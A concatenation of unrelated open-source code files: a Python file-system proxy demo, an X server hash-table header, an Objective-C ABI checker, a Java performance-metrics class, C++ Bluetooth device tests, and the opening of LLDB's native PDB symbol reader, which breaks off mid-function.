mtime = time.localtime(os.stat(name)[ST_MTIME])
return size, mtime
def info(self, name):
sum = self.sum(name)
size = os.stat(name)[ST_SIZE]
mtime = time.localtime(os.stat(name)[ST_MTIME])
return sum, size, mtime
def _list(self, function, list):
if list is None:
list = self.listfiles()
res = []
for name in list:
try:
res.append((name, function(name)))
except (os.error, IOError):
res.append((name, None))
return res
def sumlist(self, list = None):
return self._list(self.sum, list)
def statlist(self, list = None):
return self._list(self.stat, list)
def mtimelist(self, list = None):
return self._list(self.mtime, list)
def sizelist(self, list = None):
return self._list(self.size, list)
def infolist(self, list = None):
return self._list(self.info, list)
def _dict(self, function, list):
if list is None:
list = self.listfiles()
dict = {}
for name in list:
try:
dict[name] = function(name)
except (os.error, IOError):
pass
return dict
def sumdict(self, list = None):
    """Map file name -> md5 digest for each name in list (default: all files)."""
    # BUG FIX: previously called self.dict(...), which does not exist on this
    # class; the helper is _dict() (cf. infodict below, which already used it).
    return self._dict(self.sum, list)
def sizedict(self, list = None):
    """Map file name -> size in bytes."""
    return self._dict(self.size, list)
def mtimedict(self, list = None):
    """Map file name -> modification time."""
    return self._dict(self.mtime, list)
def statdict(self, list = None):
    """Map file name -> (size, mtime)."""
    return self._dict(self.stat, list)
def infodict(self, list = None):
    """Map file name -> (sum, size, mtime)."""
    return self._dict(self.info, list)
def read(self, name, offset = 0, length = -1):
self.checkfile(name)
f = open(name)
f.seek(offset)
if length == 0:
data = ''
elif length < 0:
data = f.read()
else:
data = f.read(length)
f.close()
return data
def create(self, name):
self.check(name)
if os.path.exists(name):
self.checkfile(name)
bname = name + '~'
try:
os.unlink(bname)
except os.error:
pass
os.rename(name, bname)
f = open(name, 'w')
f.close()
def write(self, name, data, offset = 0):
self.checkfile(name)
f = open(name, 'r+')
f.seek(offset)
f.write(data)
f.close()
def mkdir(self, name):
self.check(name)
os.mkdir(name, 0777)
def rmdir(self, name):
self.check(name)
os.rmdir(name)
class FSProxyServer(FSProxyLocal, server.Server):
def __init__(self, address, verbose = server.VERBOSE):
FSProxyLocal.__init__(self)
server.Server.__init__(self, address, verbose)
def _close(self):
server.Server._close(self)
FSProxyLocal._close(self)
def _serve(self):
server.Server._serve(self)
# Retreat into start directory
while self._dirstack: self.back()
class FSProxyClient(client.Client):
    # Client-side stub: method calls are forwarded over the wire by
    # client.Client's generic call machinery.
    def __init__(self, address, verbose = client.VERBOSE):
        client.Client.__init__(self, address, verbose)
def test():
    # Start an FSProxy server on the port given as the first command-line
    # argument (default 4127) and serve requests until interrupted.
    import sys
    if sys.argv[1:]:
        # int() replaces string.atoi(): identical for decimal strings and
        # still available in Python 3, where the string module helper is gone.
        port = int(sys.argv[1])
    else:
        port = 4127
    proxy = FSProxyServer(('', port))
    proxy._serverloop()
# Run the demo server when executed as a script.
if __name__ == '__main__':
    test()
| 4,037 |
521 | #ifndef HASHTABLE_H
#define HASHTABLE_H 1
#include <dix-config.h>
#include <X11/Xfuncproto.h>
#include <X11/Xdefs.h>
#include "list.h"
/** @brief A hashing function.
@param[in/out] cdata Opaque data that can be passed to HtInit that will
eventually end up here
@param[in] ptr The data to be hashed. The size of the data, if
needed, can be configured via a record that can be
passed via cdata.
@param[in] numBits The number of bits this hash needs to have in the
resulting hash
@return A numBits-bit hash of the data
*/
typedef unsigned (*HashFunc)(void * cdata, const void * ptr, int numBits);
/** @brief A comparison function for hashed keys.
    @param[in/out] cdata Opaque data that can be passed to HtInit that will
eventually end up here
@param[in] l The left side data to be compared
@param[in] r The right side data to be compared
@return -1 if l < r, 0 if l == r, 1 if l > r
*/
typedef int (*HashCompareFunc)(void * cdata, const void * l, const void * r);
struct HashTableRec;
typedef struct HashTableRec *HashTable;
/** @brief A configuration for HtGenericHash */
typedef struct {
int keySize;
} HtGenericHashSetupRec, *HtGenericHashSetupPtr;
/** @brief ht_create initializes a hash table for a certain hash table
configuration
@param[out] ht The hash table structure to initialize
@param[in] keySize The key size in bytes
@param[in] dataSize The data size in bytes
@param[in] hash The hash function to use for hashing keys
@param[in] compare The comparison function for hashing keys
@param[in] cdata Opaque data that will be passed to hash and
comparison functions
*/
extern _X_EXPORT HashTable ht_create(int keySize,
int dataSize,
HashFunc hash,
HashCompareFunc compare,
void *cdata);
/** @brief HtDestruct deinitializes the structure. It does not free the
memory allocated to HashTableRec
*/
extern _X_EXPORT void ht_destroy(HashTable ht);
/** @brief Adds a new key to the hash table. The key will be copied
and a pointer to the value will be returned. The data will
be initialized with zeroes.
@param[in/out] ht The hash table
@param[key] key The key. The contents of the key will be copied.
@return On error NULL is returned, otherwise a pointer to the data
associated with the newly inserted key.
@note If dataSize is 0, a pointer to the end of the key may be returned
to avoid returning NULL. Obviously the data pointed cannot be
modified, as implied by dataSize being 0.
*/
extern _X_EXPORT void *ht_add(HashTable ht, const void *key);
/** @brief Removes a key from the hash table along with its
associated data, which will be free'd.
*/
extern _X_EXPORT void ht_remove(HashTable ht, const void *key);
/** @brief Finds the associated data of a key from the hash table.
@return If the key cannot be found, the function returns NULL.
Otherwise it returns a pointer to the data associated
with the key.
@note If dataSize == 0, this function may return NULL
          even if the key has been inserted! If dataSize == 0,
use HtMember instead to determine if a key has been
inserted.
*/
extern _X_EXPORT void *ht_find(HashTable ht, const void *key);
/** @brief A generic hash function */
extern _X_EXPORT unsigned ht_generic_hash(void *cdata,
const void *ptr,
int numBits);
/** @brief A generic comparison function. It compares data byte-wise. */
extern _X_EXPORT int ht_generic_compare(void *cdata,
const void *l,
const void *r);
/** @brief A debugging function that dumps the distribution of the
hash table: for each bucket, list the number of elements
contained within. */
extern _X_EXPORT void ht_dump_distribution(HashTable ht);
/** @brief A debugging function that dumps the contents of the hash
table: for each bucket, list the elements contained
within. */
extern _X_EXPORT void ht_dump_contents(HashTable ht,
void (*print_key)(void *opaque, void *key),
void (*print_value)(void *opaque, void *value),
void* opaque);
/** @brief A hashing function to be used for hashing resource IDs when
used with HashTables. It makes no use of cdata, so that can
be NULL. It uses HashXID underneath, and should HashXID be
unable to hash the value, it switches into using the generic
hash function. */
extern _X_EXPORT unsigned ht_resourceid_hash(void *cdata,
const void * data,
int numBits);
/** @brief A comparison function to be used for comparing resource
IDs when used with HashTables. It makes no use of cdata,
so that can be NULL. */
extern _X_EXPORT int ht_resourceid_compare(void *cdata,
const void *a,
const void *b);
#endif // HASHTABLE_H
| 2,491 |
381 | #include "visibility.h"
#include "objc/runtime.h"
#include "module.h"
#include "gc_ops.h"
#include <assert.h>
#include <stdio.h>
#include <string.h>
/**
* The smallest ABI version number of loaded modules.
*/
static unsigned long min_loaded_version;
/**
* The largest ABI version number of loaded modules.
*/
static unsigned long max_loaded_version;
/**
* Structure defining the compatibility between Objective-C ABI versions.
*/
struct objc_abi_version
{
/** Version of this ABI. */
unsigned long version;
/** Lowest ABI version that this is compatible with. */
unsigned long min_compatible_version;
/** Highest ABI version compatible with this. */
unsigned long max_compatible_version;
/** Size of the module structure for this ABI version. */
unsigned long module_size;
};
enum
{
gcc_abi = 8,
gnustep_abi = 9,
gc_abi = 10
};
/**
* List of supported ABIs.
*/
static struct objc_abi_version known_abis[] =
{
/* GCC ABI. */
{gcc_abi, gcc_abi, gnustep_abi, sizeof(struct objc_module_abi_8)},
/* Non-fragile ABI. */
{gnustep_abi, gcc_abi, gc_abi, sizeof(struct objc_module_abi_8)},
/* GC ABI. Adds a field describing the GC mode. */
{gc_abi, gcc_abi, gc_abi, sizeof(struct objc_module_abi_10)}
};
static int known_abi_count =
(sizeof(known_abis) / sizeof(struct objc_abi_version));
#define FAIL_IF(x, msg) do {\
if (x)\
{\
fprintf(stderr, "Objective-C ABI Error: %s while loading %s\n", msg, module->name);\
return NO;\
}\
} while(0)
PRIVATE enum objc_gc_mode current_gc_mode = GC_Optional;
static BOOL endsWith(const char *string, const char *suffix)
{
if (NULL == string) { return NO; }
char *interior = strstr(string, suffix);
return (interior && (strlen(suffix) == strlen(interior)));
}
/**
 * Validates that a freshly loaded module's ABI version is compatible with
 * every module loaded so far, and resolves the process-wide GC mode.
 * Returns NO (after printing a diagnostic) on any incompatibility.
 * Updates the global min/max loaded-version window as a side effect.
 */
PRIVATE BOOL objc_check_abi_version(struct objc_module_abi_8 *module)
{
	// Count of runtime-internal modules still expected to load.
	static int runtime_modules = 5;
	// As a quick and ugly hack, skip these checks for the five .m files in
	// the runtime.  They should (in theory, at least) be aware of the GC
	// mode and behave accordingly.
	if (runtime_modules > 0)
	{
		if (endsWith(module->name, "properties.m") ||
			endsWith(module->name, "associate.m") ||
			endsWith(module->name, "arc.m") ||
			endsWith(module->name, "blocks_runtime.m") ||
			endsWith(module->name, "Protocol2.m"))
		{
			runtime_modules--;
			return YES;
		}
	}
	unsigned long version = module->version;
	unsigned long module_size = module->size;
	// The gc_mode field only exists from ABI 10 on; older modules get GC_None.
	enum objc_gc_mode gc_mode = (version < gc_abi) ? GC_None
		: ((struct objc_module_abi_10*)module)->gc_mode;
	struct objc_abi_version *v = NULL;
	for (int i=0 ; i<known_abi_count ; i++)
	{
		if (known_abis[i].version == version)
		{
			v = &known_abis[i];
			break;
		}
	}
	FAIL_IF(NULL == v, "Unknown ABI version");
	FAIL_IF((v->module_size != module_size), "Incorrect module size");
	// Only check for ABI compatibility if this is not the first module
	// (min_loaded_version is 0 until something has been loaded).
	if (min_loaded_version > 0)
	{
		FAIL_IF((v->min_compatible_version > min_loaded_version),
				"Loading modules from incompatible ABIs");
		FAIL_IF((v->max_compatible_version < max_loaded_version),
				"Loading modules from incompatible ABIs");
		// Widen the [min, max] window of versions seen so far.
		if (min_loaded_version > version)
		{
			min_loaded_version = version;
		}
		if (max_loaded_version < version)
		{
			max_loaded_version = version;
		}
	}
	else
	{
		min_loaded_version = version;
		max_loaded_version = version;
	}
	// If we're currently in GC-optional mode, then fall to one side or the
	// other if this module requires / doesn't support GC
	if (current_gc_mode == GC_Optional)
	{
		current_gc_mode = gc_mode;
		if (gc_mode == GC_Required)
		{
			enableGC(NO);
		}
	}
	// We can't mix GC_None and GC_Required code, but we can mix any other
	// combination
	FAIL_IF((gc_mode == GC_Required) && (gc_mode != current_gc_mode),
			"Attempting to mix GC and non-GC code!");
	return YES;
}
| 1,446 |
357 | <gh_stars>100-1000
/*
*
* Copyright (c) 2012-2015 VMware, Inc. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy
* of the License at http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, without
* warranties or conditions of any kind, EITHER EXPRESS OR IMPLIED. See the
* License for the specific language governing permissions and limitations
* under the License.
*
*/
package com.vmware.identity.performanceSupport;
import org.apache.commons.lang.Validate;
/**
* Maintains performance metrics of a measurement point
*
*/
public class PerfBucketMetrics
{
    private int hits;
    private long totalMs;
    private long ceilingMs; // the largest value, usually due to initial load
    private long effectiveCeilingMs; // the second largest value
    private long floorMs;

    /**
     * Creates a metrics object seeded with its first data entry.
     *
     * @param value first data entry, {@code >= 0}
     * @throws IllegalArgumentException if {@code value} is negative
     */
    public PerfBucketMetrics(long value)
    {
        checkNonNegative(value);
        hits = 1;
        totalMs = value;
        ceilingMs = value;
        effectiveCeilingMs = 0;
        floorMs = value;
    }

    /**
     * Add measurement to the metrics. Thread safe.
     *
     * @param value new data entry, {@code >= 0}
     * @throws IllegalArgumentException if {@code value} is negative
     */
    public synchronized void addMeasurement(long value)
    {
        checkNonNegative(value);
        if (Long.MAX_VALUE - totalMs < value)
        {
            reset(); // totalMs would overflow; shrink counters first
        }
        ++hits;
        totalMs += value;
        if (value > ceilingMs)
        {
            effectiveCeilingMs = ceilingMs;
            ceilingMs = value;
        }
        else if (value > effectiveCeilingMs)
        {
            effectiveCeilingMs = value;
        }
        if (value < floorMs)
        {
            floorMs = value;
        }
    }

    // Replaces org.apache.commons.lang.Validate.isTrue(value >= 0, ...) with
    // a plain JDK check; the thrown type and message are unchanged, and the
    // class no longer needs the commons-lang dependency.
    private static void checkNonNegative(long value)
    {
        if (value < 0)
        {
            throw new IllegalArgumentException(Long.toString(value));
        }
    }

    private void reset()
    {   // shrink {hits, totalMs} by 2^8 to reclaim capacity
        // while still having room to exclude the ceiling value when
        // calculating adjustedAvg.
        //
        // FIX: the original "hits = hits>>8 + 1;" parsed as
        // "hits >> (8 + 1)" because '+' binds tighter than '>>' in Java,
        // shrinking by 2^9 and usually zeroing hits. The intended scaling,
        // per the comment above, is (hits >> 8) + 1.
        hits = (hits >> 8) + 1;
        totalMs = totalMs >> 8;
        // compensate the ceiling value so that the adjustedAvg is exactly
        // as before:
        //  1. deduct the ceilingMs portion in the shrunk data
        //  2. add back the original value of ceilingMs
        totalMs -= ceilingMs >> 8;
        totalMs += ceilingMs;
        // Leaving ceiling & floor unchanged
    }

    @Override
    public String toString()
    {
        long adjustedAvg = ceilingMs; // average excluding the ceiling value due to initial load
        if (hits > 1)
        {
            adjustedAvg = (totalMs - ceilingMs) / (hits - 1);
        }
        return "PerfBucketMetrics [hits=" + hits
                + ", totalMs=" + totalMs
                + ", ceilingMs=" + ceilingMs
                + ", effectiveCeilingMs=" + effectiveCeilingMs
                + ", floorMs=" + (hits==0? 0:floorMs)
                + ", adjustedAvg=" + adjustedAvg + "]";
    }
}
| 1,312 |
380 | package n10s.result;
import org.neo4j.graphdb.Node;
import org.neo4j.graphdb.Relationship;
/**
 * Immutable value holder pairing a relationship with a node, used as a
 * procedure result row.
 */
public class RelAndNodeResult {

  public final Relationship rel;
  public final Node node;

  public RelAndNodeResult(Relationship rel, Node node) {
    this.rel = rel;
    this.node = node;
  }
}
| 104 |
369 | // Copyright (c) 2017-2021, Mudita Sp. z.o.o. All rights reserved.
// For licensing, see https://github.com/mudita/MuditaOS/LICENSE.md
#include <catch2/catch.hpp>
#include "Device.hpp"
#include "application-settings/models/bluetooth/BluetoothSettingsModel.hpp"
// Verifies Devicei equality: devices compare equal only when both name and
// address match.
TEST_CASE("Devicei comparison")
{
    Devicei device1{"Dev1"};
    Devicei device2{"Dev2"};
    Devicei device3{"Dev1"};

    bd_addr_t addr1;
    bd_addr_t addr2;
    std::string addr1Str{"00:12:6F:E7:9D:05"};
    std::string addr2Str{"F8:5C:7D:17:E4:8F"};
    sscanf_bd_addr(addr1Str.c_str(), addr1);
    sscanf_bd_addr(addr2Str.c_str(), addr2);

    SECTION("Same addresses and names")
    {
        device1.setAddress(&addr1);
        device3.setAddress(&addr1);
        REQUIRE(device1 == device3);
    }
    SECTION("Different addresses and names")
    {
        device1.setAddress(&addr1);
        device2.setAddress(&addr2);
        // FIX: this section previously asserted on device1 == device3,
        // leaving device3's address unset and never exercising the
        // different-name/different-address case it is named for.
        REQUIRE_FALSE(device1 == device2);
    }
    SECTION("Same names and different addresses")
    {
        device1.setAddress(&addr1);
        device3.setAddress(&addr2);
        REQUIRE_FALSE(device1 == device3);
    }
}
// Exercises BluetoothSettingsModel device bookkeeping: list replacement,
// active/selected device tracking, state updates and the connecting query.
TEST_CASE("Device handling")
{
    BluetoothSettingsModel settingsModel{nullptr};
    // device3 duplicates device1 (same name, same address below);
    // device4 reuses device2's address but has a different name, so it is
    // "unknown" to the model after replaceDevicesList().
    Devicei device1{"Dev1"};
    Devicei device2{"Dev2"};
    Devicei device3{"Dev1"};
    Devicei device4{"Dev4"};
    Devicei dummy{""};
    bd_addr_t addr1;
    bd_addr_t addr2;
    bd_addr_t addr3;
    std::string addr1Str{"00:12:6F:E7:9D:05"};
    std::string addr2Str{"F8:5C:7D:17:E4:8F"};
    std::string addr3Str{"F8:5C:7D:17:E4:00"};
    sscanf_bd_addr(addr1Str.c_str(), addr1);
    sscanf_bd_addr(addr2Str.c_str(), addr2);
    sscanf_bd_addr(addr3Str.c_str(), addr3);
    device1.setAddress(&addr1);
    device2.setAddress(&addr2);
    device3.setAddress(&addr1);
    device4.setAddress(&addr2);

    std::vector<Devicei> devicesList;
    devicesList.push_back(device1);
    devicesList.push_back(device2);
    devicesList.push_back(device3);

    SECTION("Replace devices list")
    {
        settingsModel.replaceDevicesList(devicesList);
        REQUIRE(settingsModel.getDevices().size() == 3);
        REQUIRE(settingsModel.getDevices() == devicesList);
    }
    SECTION("Set active device")
    {
        settingsModel.replaceDevicesList(devicesList);
        settingsModel.setActiveDevice(device2);
        REQUIRE(settingsModel.getActiveDevice().has_value());
        REQUIRE(settingsModel.getActiveDevice().value().get() == device2);
    }
    SECTION("Set wrong active device")
    {
        settingsModel.replaceDevicesList(devicesList);
        settingsModel.setActiveDevice(device4);
        REQUIRE_FALSE(settingsModel.getActiveDevice().has_value());
    }
    SECTION("Set selected device")
    {
        settingsModel.replaceDevicesList(devicesList);
        settingsModel.setSelectedDevice(device2);
        REQUIRE(settingsModel.getSelectedDevice().has_value());
        REQUIRE(settingsModel.getSelectedDevice().value().get() == device2);
    }
    SECTION("Set wrong selected device")
    {
        settingsModel.replaceDevicesList(devicesList);
        settingsModel.setSelectedDevice(device4);
        REQUIRE_FALSE(settingsModel.getSelectedDevice().has_value());
    }
    SECTION("Set active device state")
    {
        settingsModel.replaceDevicesList(devicesList);
        settingsModel.setActiveDevice(device2);
        settingsModel.setActiveDeviceState(DeviceState::ConnectedBoth);
        REQUIRE(settingsModel.getActiveDevice().value().get().deviceState == DeviceState::ConnectedBoth);
    }
    SECTION("Is device connecting? - true")
    {
        settingsModel.replaceDevicesList(devicesList);
        settingsModel.setActiveDevice(device2);
        settingsModel.setActiveDeviceState(DeviceState::Connecting);
        REQUIRE(settingsModel.isDeviceConnecting());
    }
    SECTION("Is device connecting? - false")
    {
        settingsModel.replaceDevicesList(devicesList);
        settingsModel.setActiveDevice(device2);
        settingsModel.setActiveDeviceState(DeviceState::ConnectedBoth);
        REQUIRE_FALSE(settingsModel.isDeviceConnecting());
    }
}
| 1,675 |
305 | <reponame>rarutyun/llvm
//===-- SymbolFileNativePDB.cpp -------------------------------------------===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
#include "SymbolFileNativePDB.h"
#include "clang/AST/Attr.h"
#include "clang/AST/CharUnits.h"
#include "clang/AST/Decl.h"
#include "clang/AST/DeclCXX.h"
#include "clang/AST/Type.h"
#include "Plugins/ExpressionParser/Clang/ClangUtil.h"
#include "Plugins/Language/CPlusPlus/MSVCUndecoratedNameParser.h"
#include "Plugins/TypeSystem/Clang/TypeSystemClang.h"
#include "lldb/Core/Module.h"
#include "lldb/Core/PluginManager.h"
#include "lldb/Core/StreamBuffer.h"
#include "lldb/Core/StreamFile.h"
#include "lldb/Symbol/CompileUnit.h"
#include "lldb/Symbol/LineTable.h"
#include "lldb/Symbol/ObjectFile.h"
#include "lldb/Symbol/SymbolContext.h"
#include "lldb/Symbol/SymbolVendor.h"
#include "lldb/Symbol/Variable.h"
#include "lldb/Symbol/VariableList.h"
#include "lldb/Utility/Log.h"
#include "llvm/DebugInfo/CodeView/CVRecord.h"
#include "llvm/DebugInfo/CodeView/CVTypeVisitor.h"
#include "llvm/DebugInfo/CodeView/DebugLinesSubsection.h"
#include "llvm/DebugInfo/CodeView/LazyRandomTypeCollection.h"
#include "llvm/DebugInfo/CodeView/RecordName.h"
#include "llvm/DebugInfo/CodeView/SymbolDeserializer.h"
#include "llvm/DebugInfo/CodeView/SymbolRecordHelpers.h"
#include "llvm/DebugInfo/CodeView/TypeDeserializer.h"
#include "llvm/DebugInfo/PDB/Native/DbiStream.h"
#include "llvm/DebugInfo/PDB/Native/GlobalsStream.h"
#include "llvm/DebugInfo/PDB/Native/InfoStream.h"
#include "llvm/DebugInfo/PDB/Native/ModuleDebugStream.h"
#include "llvm/DebugInfo/PDB/Native/PDBFile.h"
#include "llvm/DebugInfo/PDB/Native/SymbolStream.h"
#include "llvm/DebugInfo/PDB/Native/TpiStream.h"
#include "llvm/DebugInfo/PDB/PDBTypes.h"
#include "llvm/Demangle/MicrosoftDemangle.h"
#include "llvm/Object/COFF.h"
#include "llvm/Support/Allocator.h"
#include "llvm/Support/BinaryStreamReader.h"
#include "llvm/Support/Error.h"
#include "llvm/Support/ErrorOr.h"
#include "llvm/Support/MemoryBuffer.h"
#include "DWARFLocationExpression.h"
#include "PdbAstBuilder.h"
#include "PdbSymUid.h"
#include "PdbUtil.h"
#include "UdtRecordCompleter.h"
using namespace lldb;
using namespace lldb_private;
using namespace npdb;
using namespace llvm::codeview;
using namespace llvm::pdb;
char SymbolFileNativePDB::ID;
// Map a PDB language constant onto the corresponding LLDB language
// enumerator; anything unrecognised is reported as "unknown".
static lldb::LanguageType TranslateLanguage(PDB_Lang lang) {
  if (lang == PDB_Lang::Cpp)
    return lldb::LanguageType::eLanguageTypeC_plus_plus;
  if (lang == PDB_Lang::C)
    return lldb::LanguageType::eLanguageTypeC;
  if (lang == PDB_Lang::Swift)
    return lldb::LanguageType::eLanguageTypeSwift;
  return lldb::LanguageType::eLanguageTypeUnknown;
}
// Open and parse the PDB at PdbPath; return nullptr on any failure.
// The file's stream data is backed by memory owned by `Allocator`.
static std::unique_ptr<PDBFile> loadPDBFile(std::string PdbPath,
                                            llvm::BumpPtrAllocator &Allocator) {
  llvm::ErrorOr<std::unique_ptr<llvm::MemoryBuffer>> ErrorOrBuffer =
      llvm::MemoryBuffer::getFile(PdbPath, /*FileSize=*/-1,
                                  /*RequiresNullTerminator=*/false);
  if (!ErrorOrBuffer)
    return nullptr;
  std::unique_ptr<llvm::MemoryBuffer> Buffer = std::move(*ErrorOrBuffer);
  llvm::StringRef Path = Buffer->getBufferIdentifier();
  auto Stream = std::make_unique<llvm::MemoryBufferByteStream>(
      std::move(Buffer), llvm::support::little);
  auto File = std::make_unique<PDBFile>(Path, std::move(Stream), Allocator);
  // Parse errors are deliberately swallowed: a malformed PDB is treated
  // the same as a missing one.
  if (auto EC = File->parseFileHeaders()) {
    llvm::consumeError(std::move(EC));
    return nullptr;
  }
  if (auto EC = File->parseStreamData()) {
    llvm::consumeError(std::move(EC));
    return nullptr;
  }
  return File;
}
// Locate and load the PDB matching the given executable: read the debug
// directory from the PE/COFF file, resolve the PDB path (falling back to
// the executable's directory), and verify the GUID matches. Returns
// nullptr if any step fails.
static std::unique_ptr<PDBFile>
loadMatchingPDBFile(std::string exe_path, llvm::BumpPtrAllocator &allocator) {
  // Try to find a matching PDB for an EXE.
  using namespace llvm::object;
  auto expected_binary = createBinary(exe_path);
  // If the file isn't a PE/COFF executable, fail.
  if (!expected_binary) {
    llvm::consumeError(expected_binary.takeError());
    return nullptr;
  }
  OwningBinary<Binary> binary = std::move(*expected_binary);
  // TODO: Avoid opening the PE/COFF binary twice by reading this information
  // directly from the lldb_private::ObjectFile.
  auto *obj = llvm::dyn_cast<llvm::object::COFFObjectFile>(binary.getBinary());
  if (!obj)
    return nullptr;
  const llvm::codeview::DebugInfo *pdb_info = nullptr;
  // If it doesn't have a debug directory, fail.
  llvm::StringRef pdb_file;
  if (llvm::Error e = obj->getDebugPDBInfo(pdb_info, pdb_file)) {
    consumeError(std::move(e));
    return nullptr;
  }
  // If the file doesn't exist, perhaps the path specified at build time
  // doesn't match the PDB's current location, so check the location of the
  // executable.
  if (!FileSystem::Instance().Exists(pdb_file)) {
    const auto exe_dir = FileSpec(exe_path).CopyByRemovingLastPathComponent();
    const auto pdb_name = FileSpec(pdb_file).GetFilename().GetCString();
    pdb_file = exe_dir.CopyByAppendingPathComponent(pdb_name).GetCString();
  }
  // If the file is not a PDB or if it doesn't have a matching GUID, fail.
  llvm::file_magic magic;
  auto ec = llvm::identify_magic(pdb_file, magic);
  if (ec || magic != llvm::file_magic::pdb)
    return nullptr;
  std::unique_ptr<PDBFile> pdb = loadPDBFile(std::string(pdb_file), allocator);
  if (!pdb)
    return nullptr;
  auto expected_info = pdb->getPDBInfoStream();
  if (!expected_info) {
    llvm::consumeError(expected_info.takeError());
    return nullptr;
  }
  // The GUID in the executable's debug directory must match the PDB's.
  llvm::codeview::GUID guid;
  memcpy(&guid, pdb_info->PDB70.Signature, 16);
  if (expected_info->getGuid() != guid)
    return nullptr;
  return pdb;
}
// Stub: should report whether `addr` falls in a function prologue.
// Currently always returns false (see FIXME).
static bool IsFunctionPrologue(const CompilandIndexItem &cci,
                               lldb::addr_t addr) {
  // FIXME: Implement this.
  return false;
}
// Stub: should report whether `addr` falls in a function epilogue.
// Currently always returns false (see FIXME).
static bool IsFunctionEpilogue(const CompilandIndexItem &cci,
                               lldb::addr_t addr) {
  // FIXME: Implement this.
  return false;
}
// Return the C/C++ spelling of a CodeView simple (builtin) type kind, or
// an empty string for kinds with no translation.
static llvm::StringRef GetSimpleTypeName(SimpleTypeKind kind) {
  switch (kind) {
  case SimpleTypeKind::Boolean128:
  case SimpleTypeKind::Boolean16:
  case SimpleTypeKind::Boolean32:
  case SimpleTypeKind::Boolean64:
  case SimpleTypeKind::Boolean8:
    return "bool";
  case SimpleTypeKind::Byte:
  case SimpleTypeKind::UnsignedCharacter:
    return "unsigned char";
  case SimpleTypeKind::NarrowCharacter:
    return "char";
  case SimpleTypeKind::SignedCharacter:
  case SimpleTypeKind::SByte:
    return "signed char";
  case SimpleTypeKind::Character16:
    return "char16_t";
  case SimpleTypeKind::Character32:
    return "char32_t";
  case SimpleTypeKind::Complex80:
  case SimpleTypeKind::Complex64:
  case SimpleTypeKind::Complex32:
    return "complex";
  case SimpleTypeKind::Float128:
  case SimpleTypeKind::Float80:
    return "long double";
  case SimpleTypeKind::Float64:
    return "double";
  case SimpleTypeKind::Float32:
    return "float";
  case SimpleTypeKind::Float16:
    return "single";
  case SimpleTypeKind::Int128:
    return "__int128";
  case SimpleTypeKind::Int64:
  case SimpleTypeKind::Int64Quad:
    return "int64_t";
  case SimpleTypeKind::Int32:
    return "int";
  case SimpleTypeKind::Int16:
    return "short";
  case SimpleTypeKind::UInt128:
    return "unsigned __int128";
  case SimpleTypeKind::UInt64:
  case SimpleTypeKind::UInt64Quad:
    return "uint64_t";
  case SimpleTypeKind::HResult:
    return "HRESULT";
  case SimpleTypeKind::UInt32:
    return "unsigned";
  case SimpleTypeKind::UInt16:
  case SimpleTypeKind::UInt16Short:
    return "unsigned short";
  case SimpleTypeKind::Int32Long:
    return "long";
  case SimpleTypeKind::UInt32Long:
    return "unsigned long";
  case SimpleTypeKind::Void:
    return "void";
  case SimpleTypeKind::WideCharacter:
    return "wchar_t";
  default:
    // Includes NotTranslated and any 16-bit-era kinds we don't surface.
    return "";
  }
}
// Structures, classes and interfaces are all "class-like" CodeView records.
static bool IsClassRecord(TypeLeafKind kind) {
  return kind == LF_STRUCTURE || kind == LF_CLASS || kind == LF_INTERFACE;
}
// Register this symbol-file plugin with LLDB's plugin manager.
void SymbolFileNativePDB::Initialize() {
  PluginManager::RegisterPlugin(GetPluginNameStatic(),
                                GetPluginDescriptionStatic(), CreateInstance,
                                DebuggerInitialize);
}
// Unregister the plugin on shutdown.
void SymbolFileNativePDB::Terminate() {
  PluginManager::UnregisterPlugin(CreateInstance);
}
// No per-debugger initialization is needed for this plugin.
void SymbolFileNativePDB::DebuggerInitialize(Debugger &debugger) {}
// Plugin identifier used for registration and `settings` lookups.
ConstString SymbolFileNativePDB::GetPluginNameStatic() {
  static ConstString g_name("native-pdb");
  return g_name;
}
// Human-readable plugin description shown by LLDB.
const char *SymbolFileNativePDB::GetPluginDescriptionStatic() {
  return "Microsoft PDB debug symbol cross-platform file reader.";
}
// Factory hook used by the plugin manager.
SymbolFile *SymbolFileNativePDB::CreateInstance(ObjectFileSP objfile_sp) {
  return new SymbolFileNativePDB(std::move(objfile_sp));
}
// Construction only stores the object file; PDB loading is deferred to
// CalculateAbilities()/InitializeObject().
SymbolFileNativePDB::SymbolFileNativePDB(ObjectFileSP objfile_sp)
    : SymbolFile(std::move(objfile_sp)) {}

SymbolFileNativePDB::~SymbolFileNativePDB() {}
// Report what this symbol file can provide. Lazily locates and indexes the
// PDB on first call; returns 0 when no usable PDB can be found.
uint32_t SymbolFileNativePDB::CalculateAbilities() {
  uint32_t abilities = 0;
  if (!m_objfile_sp)
    return 0;

  if (!m_index) {
    // Lazily load and match the PDB file, but only do this once.
    std::unique_ptr<PDBFile> file_up =
        loadMatchingPDBFile(m_objfile_sp->GetFileSpec().GetPath(), m_allocator);

    if (!file_up) {
      auto module_sp = m_objfile_sp->GetModule();
      if (!module_sp)
        return 0;

      // See if any symbol file is specified through `--symfile` option.
      FileSpec symfile = module_sp->GetSymbolFileFileSpec();
      if (!symfile)
        return 0;

      file_up = loadPDBFile(symfile.GetPath(), m_allocator);
    }

    if (!file_up)
      return 0;

    auto expected_index = PdbIndex::create(std::move(file_up));
    if (!expected_index) {
      llvm::consumeError(expected_index.takeError());
      return 0;
    }

    m_index = std::move(*expected_index);
  }
  if (!m_index)
    return 0;

  // We don't especially have to be precise here. We only distinguish between
  // stripped and not stripped.
  abilities = kAllAbilities;

  if (m_index->dbi().isStripped())
    abilities &= ~(Blocks | LocalVariables);
  return abilities;
}
// Bind the index to the object file's load address and set up the Clang
// AST builder used to materialize types.
void SymbolFileNativePDB::InitializeObject() {
  m_obj_load_address = m_objfile_sp->GetBaseAddress().GetFileAddress();
  m_index->SetLoadAddress(m_obj_load_address);
  m_index->ParseSectionContribs();

  auto ts_or_err = m_objfile_sp->GetModule()->GetTypeSystemForLanguage(
      lldb::eLanguageTypeC_plus_plus);
  if (auto err = ts_or_err.takeError()) {
    LLDB_LOG_ERROR(lldb_private::GetLogIfAnyCategoriesSet(LIBLLDB_LOG_SYMBOLS),
                   std::move(err), "Failed to initialize");
  } else {
